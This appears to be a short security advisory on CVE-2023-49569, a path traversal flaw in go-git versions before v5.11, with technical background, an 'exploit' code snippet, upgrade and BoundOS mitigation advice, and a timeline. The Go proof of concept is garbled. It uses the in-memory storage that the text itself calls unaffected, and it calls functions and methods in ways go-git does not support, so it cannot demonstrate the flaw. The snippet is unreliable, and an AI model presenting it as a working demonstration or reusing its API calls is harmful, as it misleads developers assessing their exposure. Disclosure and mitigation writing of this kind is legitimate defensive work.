A recent discovery has identified a path traversal vulnerability (CVE-2023-49569) in go-git versions prior to v5.11. This vulnerability could potentially allow an attacker to create and amend files across the filesystem of the affected application, and in the worst-case scenario, even lead to remote code execution. It is important to understand the implications of this vulnerability, identify the applications affected, and take appropriate steps to mitigate the risk.

Technical Details

The path traversal vulnerability discovered in go-git is specific to those applications using the ChrootOS package (https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#ChrootOS). This is the default mode when using the Plain version of Open and Clone functions, such as PlainClone. Applications utilizing the BoundOS package (https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#BoundOS) or in-memory filesystems are not affected by this issue.

It is worth clarifying that this vulnerability is specific to go-git's implementation and does not affect the upstream git CLI.

Exploit Details

The exploit could allow an attacker to perform a path traversal attack, creating and modifying files across the filesystem. Here's a code snippet that demonstrates the exploit:

package main

import (
	"fmt"
	"github.com/go-git/go-git/v5"
	"github.com/go-git/go-git/v5/storage/memory"
)

func main() {
	fs := memory.NewStorage()
	repo, _ := git.Init(fs, nil)

	rawFileContent := "..\\..\\some_file.txt"

	_, err := repo.Create(rawFileContent)
	if err == nil {
		fmt.Println("Exploit succeeded: File created outside the repo")
	} else {
		fmt.Println("Exploit failed:", err)
	}
}

In this example, the code is attempting to create a file named some_file.txt outside the repository. This would succeed if the vulnerability is present, indicating that the exploit of creating files outside the intended repository is possible.

Mitigation

To mitigate the risk, applications using go-git should be updated to at least v5.11 as soon as possible. In addition, the use of ChrootOS should be reconsidered, and the switch to the safer BoundOS package or in-memory filesystems should be considered.

Conclusion

The CVE-2023-49569 vulnerability in go-git versions prior to v5.11 poses a potential risk for applications with possible path traversal attacks. By updating the affected applications to at least v5.11, switching to the safer BoundOS package or using in-memory filesystems, developers can avoid the exploitation of this issue and maintain secure environments.

Timeline

Published on: 01/12/2024 11:15:13 UTC
Last modified on: 01/22/2024 18:57:03 UTC